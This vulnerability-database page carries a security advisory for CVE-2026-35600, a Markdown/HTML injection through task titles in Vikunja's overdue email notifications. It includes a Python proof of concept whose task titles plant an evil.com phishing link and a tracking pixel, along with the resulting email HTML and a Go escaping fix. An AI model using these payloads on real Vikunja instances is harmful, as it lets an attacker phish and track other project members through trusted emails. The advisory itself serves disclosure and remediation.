GHSA-45Q4-X4R9-8FQJ

Vulnerability from github – Published: 2026-04-10 15:34 – Updated: 2026-04-10 19:45
VLAI?
Summary
Vikunja has HTML Injection via Task Titles in Overdue Email Notifications
Details

Summary

Task titles are embedded directly into Markdown link syntax in overdue email notifications without escaping Markdown special characters. When rendered by goldmark and sanitized by bluemonday (which allows <a> and <img> tags), injected Markdown constructs produce phishing links and tracking pixels in legitimate notification emails.

Details

The overdue task notification at pkg/models/notifications.go:360 constructs a Markdown list entry:

overdueLine += `* [` + task.Title + `](` + config.ServicePublicURL.GetString() + "tasks/" + strconv.FormatInt(task.ID, 10) + `) ...`

The task title is placed inside Markdown link syntax [TITLE](URL). A title containing ] and [ breaks the link structure. The assembled Markdown is converted to HTML by goldmark at pkg/notifications/mail_render.go:214, then sanitized by bluemonday's UGCPolicy. Since UGCPolicy intentionally allows <a href> and <img src> with http/https URLs, the injected links and images survive sanitization and reach the email recipient.

The same pattern affects multiple notification types at notifications.go lines 72, 176, 227, and 318.

Proof of Concept

Tested on Vikunja v2.2.2 with SMTP enabled (MailHog as sink).

import requests

TARGET = "http://localhost:3456"
API = f"{TARGET}/api/v1"

token = requests.post(f"{API}/login",
    json={"username": "alice", "password": "Alice1234!"}).json()["token"]
h = {"Authorization": f"Bearer {token}", "Content-Type": "application/json"}

proj = requests.put(f"{API}/projects", headers=h, json={"title": "Shared"}).json()

# create task with markdown injection in title + past due date
requests.put(f"{API}/projects/{proj['id']}/tasks", headers=h, json={
    "title": 'test](https://evil.com) [Click to verify your account',
    "due_date": "2026-03-26T00:00:00Z"})

# create task with tracking pixel injection
requests.put(f"{API}/projects/{proj['id']}/tasks", headers=h, json={
    "title": '![](https://evil.com/track.png?user=bob)',
    "due_date": "2026-03-26T00:00:00Z"})

# enable overdue reminders for the user
requests.post(f"{API}/user/settings/general", headers=h, json={
    "email_reminders_enabled": True,
    "overdue_tasks_reminders_enabled": True,
    "overdue_tasks_reminders_time": "09:00"})

# wait for the overdue notification cron to fire, then inspect the email

The overdue notification email HTML contains:

<li>
  <a href="https://evil.com">test</a>
  <a href="http://vikunja.example/tasks/5">Click to verify your account</a>
  (Shared), since one day
</li>
<li>
  <a href="http://vikunja.example/tasks/6">
    <img src="https://evil.com/track.png?user=bob">
  </a>
  (Shared), since one day
</li>

The attacker's evil.com link appears as a clickable link in a legitimate Vikunja notification email. The tracking pixel loads when the email is opened.

Impact

An attacker with write access to a shared project can craft task titles that inject phishing links or tracking images into overdue email notifications sent to other project members. Because these links appear within legitimate Vikunja notification emails from the configured SMTP server, recipients are more likely to trust and click them.

Recommended Fix

Escape Markdown special characters in task titles before embedding them in Markdown content:

func escapeMarkdown(s string) string {
    replacer := strings.NewReplacer(
        "[", "\\[", "]", "\\]",
        "(", "\\(", ")", "\\)",
        "!", "\\!", "`", "\\`",
        "*", "\\*", "_", "\\_",
        "#", "\\#",
    )
    return replacer.Replace(s)
}

Found and reported by aisafe.io

Severity ?
5.4 (Medium)
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.2.2"
      },
      "package": {
        "ecosystem": "Go",
        "name": "code.vikunja.io/api"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.3.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-35600"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-10T15:34:53Z",
    "nvd_published_at": "2026-04-10T17:17:03Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nTask titles are embedded directly into Markdown link syntax in overdue email notifications without escaping Markdown special characters. When rendered by goldmark and sanitized by bluemonday (which allows `\u003ca\u003e` and `\u003cimg\u003e` tags), injected Markdown constructs produce phishing links and tracking pixels in legitimate notification emails.\n\n## Details\n\nThe overdue task notification at `pkg/models/notifications.go:360` constructs a Markdown list entry:\n\n```go\noverdueLine += `* [` + task.Title + `](` + config.ServicePublicURL.GetString() + \"tasks/\" + strconv.FormatInt(task.ID, 10) + `) ...`\n```\n\nThe task title is placed inside Markdown link syntax `[TITLE](URL)`. A title containing `]` and `[` breaks the link structure. The assembled Markdown is converted to HTML by goldmark at `pkg/notifications/mail_render.go:214`, then sanitized by bluemonday\u0027s UGCPolicy. Since UGCPolicy intentionally allows `\u003ca href\u003e` and `\u003cimg src\u003e` with http/https URLs, the injected links and images survive sanitization and reach the email recipient.\n\nThe same pattern affects multiple notification types at `notifications.go` lines 72, 176, 227, and 318.\n\n## Proof of Concept\n\nTested on Vikunja v2.2.2 with SMTP enabled (MailHog as sink).\n\n```python\nimport requests\n\nTARGET = \"http://localhost:3456\"\nAPI = f\"{TARGET}/api/v1\"\n\ntoken = requests.post(f\"{API}/login\",\n    json={\"username\": \"alice\", \"password\": \"Alice1234!\"}).json()[\"token\"]\nh = {\"Authorization\": f\"Bearer {token}\", \"Content-Type\": \"application/json\"}\n\nproj = requests.put(f\"{API}/projects\", headers=h, json={\"title\": \"Shared\"}).json()\n\n# create task with markdown injection in title + past due date\nrequests.put(f\"{API}/projects/{proj[\u0027id\u0027]}/tasks\", headers=h, json={\n    \"title\": \u0027test](https://evil.com) [Click to verify your account\u0027,\n    \"due_date\": \"2026-03-26T00:00:00Z\"})\n\n# create task with tracking pixel injection\nrequests.put(f\"{API}/projects/{proj[\u0027id\u0027]}/tasks\", headers=h, json={\n    \"title\": \u0027![](https://evil.com/track.png?user=bob)\u0027,\n    \"due_date\": \"2026-03-26T00:00:00Z\"})\n\n# enable overdue reminders for the user\nrequests.post(f\"{API}/user/settings/general\", headers=h, json={\n    \"email_reminders_enabled\": True,\n    \"overdue_tasks_reminders_enabled\": True,\n    \"overdue_tasks_reminders_time\": \"09:00\"})\n\n# wait for the overdue notification cron to fire, then inspect the email\n```\n\nThe overdue notification email HTML contains:\n```html\n\u003cli\u003e\n  \u003ca href=\"https://evil.com\"\u003etest\u003c/a\u003e\n  \u003ca href=\"http://vikunja.example/tasks/5\"\u003eClick to verify your account\u003c/a\u003e\n  (Shared), since one day\n\u003c/li\u003e\n\u003cli\u003e\n  \u003ca href=\"http://vikunja.example/tasks/6\"\u003e\n    \u003cimg src=\"https://evil.com/track.png?user=bob\"\u003e\n  \u003c/a\u003e\n  (Shared), since one day\n\u003c/li\u003e\n```\n\nThe attacker\u0027s `evil.com` link appears as a clickable link in a legitimate Vikunja notification email. The tracking pixel loads when the email is opened.\n\n## Impact\n\nAn attacker with write access to a shared project can craft task titles that inject phishing links or tracking images into overdue email notifications sent to other project members. Because these links appear within legitimate Vikunja notification emails from the configured SMTP server, recipients are more likely to trust and click them.\n\n## Recommended Fix\n\nEscape Markdown special characters in task titles before embedding them in Markdown content:\n\n```go\nfunc escapeMarkdown(s string) string {\n    replacer := strings.NewReplacer(\n        \"[\", \"\\\\[\", \"]\", \"\\\\]\",\n        \"(\", \"\\\\(\", \")\", \"\\\\)\",\n        \"!\", \"\\\\!\", \"`\", \"\\\\`\",\n        \"*\", \"\\\\*\", \"_\", \"\\\\_\",\n        \"#\", \"\\\\#\",\n    )\n    return replacer.Replace(s)\n}\n```\n\n---\n*Found and reported by [aisafe.io](https://aisafe.io)*",
  "id": "GHSA-45q4-x4r9-8fqj",
  "modified": "2026-04-10T19:45:50Z",
  "published": "2026-04-10T15:34:53Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-45q4-x4r9-8fqj"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35600"
    },
    {
      "type": "WEB",
      "url": "https://github.com/go-vikunja/vikunja/pull/2580"
    },
    {
      "type": "WEB",
      "url": "https://github.com/go-vikunja/vikunja/commit/0f3730d045f20e261e3cdfc6d93c325653395b64"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/go-vikunja/vikunja"
    },
    {
      "type": "WEB",
      "url": "https://github.com/go-vikunja/vikunja/releases/tag/v2.3.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Vikunja has HTML Injection via Task Titles in Overdue Email Notifications"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.